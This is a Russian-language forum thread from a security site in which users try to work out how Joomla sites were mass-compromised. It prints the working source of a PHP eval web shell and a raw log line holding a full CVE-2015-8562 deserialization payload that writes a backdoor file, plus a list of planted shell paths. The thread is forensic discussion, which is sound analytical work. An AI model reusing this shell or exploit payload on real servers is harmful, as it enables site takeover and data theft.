ANTICHAT — форум по информационной безопасности, OSINT и технологиям

охота, это хорошее дело...

А ты случайно не казачок ли засланный?

Лолирую с топика. Если не знал, то массовый взлом сайтов - обычное явление на шаред-хостинге. А если выражаться точнее то это баян баянистый. Этот процесс происходит уже лет 10 наверно. Из своего опыта могу сказать, что минимум 10% всех сайтов на жумле и вордпрессе уже взломаны кем-то.

Малварь распространяется автоматически. Залился вирус на сайт и тут-же этот вирус начинает сканировать другие сайты и так до бесконечности.

Если ты думал, что открыл Америку то ошибаешься. Смотреть как ломают говносайты другие и повторять за ними - этим уже занимаются тысячи кулхацкеров.

Да ты гений просто, 'залился вирус на сайт'. Ясен *** что вручную на миллионы сайтов никто не вкачивал, вот меня и интересует техническая сторона именно этого случая.

Я тоже вслед залился и зарутал некоторые сервера, нужна помощь в расшифровке - логов и файлов, чтобы понять как он залился.

к примеру как работает это шелл

$value) {

$data = $value;

$data_key = $key;

}

if(!$data) {

foreach($_POST as $key => $value) {

$data = $value;

$data_key = $key;

}

}

$data = @unserialize(sh_decrypt(@base64_decode( $data ) , $data_key ));

if (isset($data["ak"]) && $auth == $data["ak"]) {

if ($data["a"] == "i") {

$i = Array("pv" => @phpversion() , "sv" => "1.0-1" , );

echo @serialize($i);

}

elseif ($data["a"] == "e") {

eval($data["d"]);

}

}

?>

А что такого я сказал? Всё именно так. Просто вирус, просто залился, просто на говносайт. Вот и всё. Банальный eval() которому на выполнение подают код расксореный ключём $GLOBALS["auth"]. Кстати, судя по коду писал его нуб.

Ага. Чтобы понять как он залился и начать заливать самому, да?

Понять как он залился после того как он уже залился ты не сможешь. Потому что веб-сервер логирует только айпишник, юзер-агент и URI запроса. В большинстве случаев http-запрос на выполнение кода отправляется POST-запросом. В лог попадают только GET-параметры а набор POST-параметров (по которым и можно понять как взломали сайт) не логируется.

Можно только сделать honeypot на жумле который будет логировать все http-запросы со всеми их параметрами. Но это превентивная мера а ты предлагаешь изучать последствия уже взломанных сайтов.

Логи тебе ничего не дадут по причине вышесказанного. Можно только найти URI по которому был сделан POST-запрос и, если повезёт, то он будет специфическим и по нему можно будет нагуглить описание дыры в жумле. В самом идеальном и невероятном случае сайт взломан GET-запросом, при этом естественно его параметры попадут в лог, но это крайняя редкость.

Если ты собрался рассылать малварь по инэту то зря стараешься. Проще не смотреть как делает кто-то а находить топовые уязвимости и сканировать веб по ним.

вот тут hxxp://rniiap.ru/forum/profile/1769-joomla-user-helper-cisev.html - последняя версия между прочем - является супердмином, созданным в результате запроса к базе данных.

при создании было обращение к файлу на серваке. В логах это пишется, к какому файлу было обращение.

этот юзер нигде никогда не заходил

ниже - сайт другой, версия другая, но юзер - аналогичный

между прочим вот твой редкий случай - вот он заливает шелл НО ЭТО БЫЛ НЕ ОН ! это CVE-2015-8562 и не работает на этом серваке...

========================

"GET / HTTP/1.1" 200 43723 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"f c\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\ 0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"Simp lePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriver Mysql\":0:{}s:8:\"feed_url\";s:237:\"file_put_cont ents($_SERVER[\"DOCUMENT_ROOT\"].chr(47).\"admim.php\",\"|=|\\x3C\".chr(63).\"php \\x24mujj=\\x24_POST['gtr'];if(\\x24mujj!=''){\\x24xsser=base64_decode(\\x24_ POST['z0']);@eval(\\\"\\\\\\x24safedg=\\x24xsser;\\\");}\"); JFactory::getConfig();exit;\";s:19:\"cache_name_fu nction\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"c ache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i: 1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1; }~\xd9"

=====================

отстальные запросы были:

"GET /administrator/components/com_installer/akdjxnk/rxttekb.php 6B

"GET /components/com_rokquickcart/assets/gallery45.php

"GET /images/stories/postelnie/TWINS/dir.php

"GET /includes/js/jscalendar-1.0/session.php

"GET /media/shop/admin_files/html/admin.function_form.php

"GET /modules/mod_newsflash/helper.php

"GET /modules/mod_virtuemart/vm_transmenu/img/javascript.php

"POST /administrator/components/com_categories/toolbar.categories.html.php

"POST /administrator/components/com_config/toolbar.config.html.php

"POST /administrator/components/com_installer/akdjxnk/rxttekb.php

"POST /components/com_poll/assets/plugin27.php

"POST /components/com_rokquickcart/assets/gallery45.php

Это снифер по кукам и пост запросам с элементом бэгдора. цель шифрования для защиты уже перехваченных данных от сторонних глаз, следовательно данные могут иметь весомое значение! тут явно код не закончен.